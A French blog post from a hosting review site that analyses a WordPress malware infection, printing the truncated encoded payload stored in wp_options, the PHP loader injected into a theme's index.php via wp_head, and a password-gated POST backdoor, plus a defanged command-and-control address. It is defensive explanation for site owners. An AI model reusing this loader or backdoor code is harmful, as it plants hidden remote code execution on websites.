Hacké la base de données et wp_head Wordpress par injection


, Mis à jour le 29 mai, 2014

Hacké la base de données et wp_head Wordpress par injection

Il existe plusieurs endroits où une injection de logiciels malveillants peuvent être cachés sur un site web. Sur WordPress, par exemple, l’injection de virus peut avoir lieu dans les fichiers de base, des thèmes, des plugins, le .htaccess et dans la base de données. La plupart du temps, le malware utilise une combinaison de plusieurs méthodes d’injections ou plus ce qui le rend plus difficile à détecter.

Aujourd'hui, nous allons parler d'une injection de la base de données qui est devenu assez fréquente ces derniers temps. Ce type d’injection utilise wp_head () pour afficher le malware à toute personne visitant un site web piraté.

Injection de base de données

WordPress offre de multiples requêtes API pour gérer et lire le contenu à partir de la base de données. L'une de ces requêtes est la fonction de get_option qui renvoie une valeur de la table wp_options. Le tableau des wp_options est largement utilisé par de nombreux plugins et des thèmes pour stocker des données à long terme. Généralement il est plein d'entrées ce qui en fait un bon endroit pour cacher un code malveillant.

Si vous ne me croyez pas, allez à la table wp_options pour voir ce dont je parle.

Voici ce que peut contenir un tableau wp_options d’un site hacké:

 

s:7546:"a:18:{i:0;s:10:"11-07-2013";i:1;s:1:"e";i:2;s:32:"061d57e97e504a23cc932031f712f730";i:3;s:32:"07b6910226033fa5ee75721b4fc6573f";i:4;s:4:"val(";i:5;s:32:"2a27230f54e4cea4a8ed38d66e2c0";i:6;s:1:"(";i:7;s:6993:"'LyogTXVuaW5uIHZlcnNpb246MSBkYXRlOjIxLjVFsncGFzcyddKT09PSc2OTJlM2Y1MmVlNmYxNmJjNzhmYTZlMWVjNGJkNGE2YScVCwgRVhUUl9TS0lQKTsKCglpZighZW1wdHkoJHRob3IpKQoJCUAkdGhvcigkaGFdGlvbl9leGlzdHMgKCdzdHJpcG9zJykpIHsKCWZ1bmN0aW9uIHN0cmlwb3MgKCRG9mZnNldD0wKSB7CgkJcmV0dXJuIHN0cnBvcyAoc3RydG...... trop long pour tout afficher ..

Comme vous pouvez le voir, il s'agit d'une entrée de PHP sérialisé (entièrement décodé sur ddecode) qui, à première vue, ne semble pas trop mauvais et ne peut pas vraiment faire de mal en soi.

L'exécution du contenu de la base

Le code malveillant a été caché à l'intérieur de la base de données, mais comment peut-il être exécuté? Les pirates, en plus de l'injection de ce contenu, ont  également modifié le fichier index.php du thème avec ce code:

 function page_options() { $option = get_option("page_option"); $opt= unserialize( $option);        @$arg = create_function("", $opt[1] .$opt[4] .$opt[10]. $opt[12].$opt[14]. $opt[7] );return $arg('');}add_action('wp_head', 'page_options'); 

Et c'est là que tout se lie ensemble.

  • Ce code utilise get_option pour télécharger le contenu de "page_option" de la base de données : get_option ("page_option");
  • Puisque le contenu est encrypté, il le décrypte() avec ce code: $opt = unserialize ($option);
  • Ce qui construit une nouvelle fonction appelée $arg et l'exécute sur la base du contenu récupéré. Ce n'est que lorsque cette fonction est exécutée que le malware devient actif @$arg = create_function.

 
La dernière pièce du puzzle est effectué par la fonction de add_action(). Ce qui entraîne l’exécution de la fonction dans la section « head » (initialisation) de WordPress.

Ce qui est intéressant, c'est qu'avec un tel code simple, les pirates sont capables de contourner la plupart des outils de sécurité qui recherchent certaines commandes tels que : eval, base64_decode ou les traces de requêtes du système.

Backdoor et injection

Une fois ce type de logiciel malveillant est installé sur un site compromis, il devient comme une Backdoor (exécutant les valeurs de la variable POST Thor et le Hammer):

if( @md5($_POST["pass"])==='692e3f52ee6f16bc78fa6e1ec4bd4a6a') {        @extract( $_POST, EXTR_SKIP);        if(!empty($thor))               @$thor( $hammer);}

Ce malware injecte également du contenu malveillant lié à l’injection «WORDPRESS COUNTER » à partir du navigateur de toute personne visitant le site (téléchargeable sur le site de commande et de contrôle:
httx :/ / kadaffizzet.com / kasiapa).

Conclusion

Vous ne pouvez pas compter sur une simple recherche par mot clé pour identifier les injections de logiciels malveillants. Les hackers évoluent et utilisent plusieurs tactiques pour cacher leurs backdoors et des outils malveillants. Si vous avez besoin d'aide pour nettoyer votre site WordPress, veuillez nous contacter pour un devis.


comments powered by Disqus

Comment changer un domaine principal wp multi-site

Comment changer un domaine principal wp multi-site

Si vous voulez changer le domaine principal de l'installation de votre WordPress multi-site, il y a 5 valeurs à modifier. Vous n’aurez pas besoin d'effectuer une dump de base de données. Ceci est en fait désapprouvé parceque WordPress enregistre des données en séries, et la modification de cela peut … Continuer

Publié le 8 octobre, 2016

0 Commentaires
Supprimer le spam dans wordpress

Supprimer le spam dans wordpress

L’augmentation des commentaires spams dans WordPress devenant un problème, vous vous retrouvez peut-être avec des centaines, voire même des milliers de commentaires en attente que vous avez à supprimer. Malheureusement, l’installation de base de WordPress vous laisse seulement supprimer en masse les … Continuer

Publié le 8 mai, 2016

0 Commentaires
Optimiser la base de données de Wordpress avec Cron

Optimiser la base de données de Wordpress avec Cron

Nous avons déjà souligné l’importance d’avoir une base de données simple et optimisée pour votre site web WordPress pour accélérer la performance de votre site. Après un certain temps, les tableaux MySQL deviennent encombrés et exigeront grandement quelques réparations et travaux d’entretien. Comme … Continuer

Publié le 24 janvier, 2016

0 Commentaires
Comment protéger wp-config.php

Comment protéger wp-config.php

Il est triste de constater à quel point de nombreux sites WordPress sont incroyablement faciles à pirater. Beaucoup d'entre eux ne sont même équipé de la dernière version. Cependant, l'un des fichiers parmi les plus dangereux et les plus sensibles dans WordPress est le wp-config.php. Ce fichier cont … Continuer

Publié le 21 octobre, 2015

0 Commentaires
Comment changer un site html en un site Wordpress

Comment changer un site html en un site Wordpress

Récemment, sur un forum que je fréquente, une vieille connaissance m’a demandé comment convertir un de ses anciens sites Dreamweaver vers WordPress, sans que cela ne lui demande trop d’effort. J’ai d’abord pensé que ce serait impossible de faire cela facilement, mais après avoir vu d’autres réponses … Continuer

Publié le 13 juillet, 2015

2 Commentaires
Comment ajouter un bouton donation dans Wordpress

Comment ajouter un bouton donation dans Wordpress

Il y a un grand nombre de sites web qui offrent des logiciels gratuits ou autres services libres de droit (open source). Les développeurs font beaucoup d’efforts pour nous fournir des outils spécialisés pour divers besoins. Les plugins WordPress sont eux-mêmes un bon exemple. Regardez le nombre d’ad … Continuer

Publié le 11 juillet, 2015

0 Commentaires
Comment installer SSL dans Wordpress

Comment installer SSL dans Wordpress

Tous les jours, nous révélons des informations personnelles sur internet. Rien que pendant la dernière heure, j’ai utilisé ma carte de crédit, acheté un livre, sauvegardé une copie de l’adresse de mes amis, envoyé des mails et fait quelques courses. Partager nos informations est devenu tellement co … Continuer

Publié le 28 février, 2015

0 Commentaires



Les avis des clients

Avis des utilisateurs


Faites entendre votre voix. Passez en revue votre fournisseur d'hébergement Web - bon ou mauvais.


Après 6 ans chez ovh, j'ai décidé de tout transférer chez lws pour des deux raisons, le support et prix, ils ont un support super actif et immédiat aussi la crédibilité au niveau tarifaire, les prix sont stables et ne cessent de diminuer en améliorant les performances sans surprises lors du renouvel …

Youssef à propos LWS

Montrer une autre revue
Lire les avis LWS



Plans d'hébergement




Les plans d'hébergement de 60 sociétés d'hébergement partout dans le monde


Meilleur hébergeurs web

# hébergeur web prix action

1

Ikoula

1.95 EURO

Ajouter un Avis
Visiter

2

Siteground

6.95 USD

Ajouter un Avis
Visiter

3

Ex2hosting

3.99 EURO

Ajouter un Avis
Visiter

4

Inmotion

5.95 USD

Ajouter un Avis
Visiter

5

Webhostinghub

4.95 USD

Ajouter un Avis
Visiter

6

Bluehost

6.95 USD

Ajouter un Avis
Visiter






Hébergeurs par avis de clients

Ex2hosting
78 avis des clients
Nuxit France
70 avis des clients
Hostpapa France
67 avis des clients
1and1 France
62 avis des clients
Rapidenet
50 avis des clients
Ajouter un avis Tous les profils


Hébergeurs par fidélité de clients

Ex2hosting
73 / 78 recommandé
Nuxit France
68 / 70 recommandé
Rapidenet
49 / 50 recommandé
Infomaniak France
48 / 48 recommandé
Hostpapa France
39 / 67 recommandé
Évaluer hébergeur Tous les profils


Question de la Semaine


Le plus important critère de votre hébergeur



Contacter l'éditeur

Posez votre question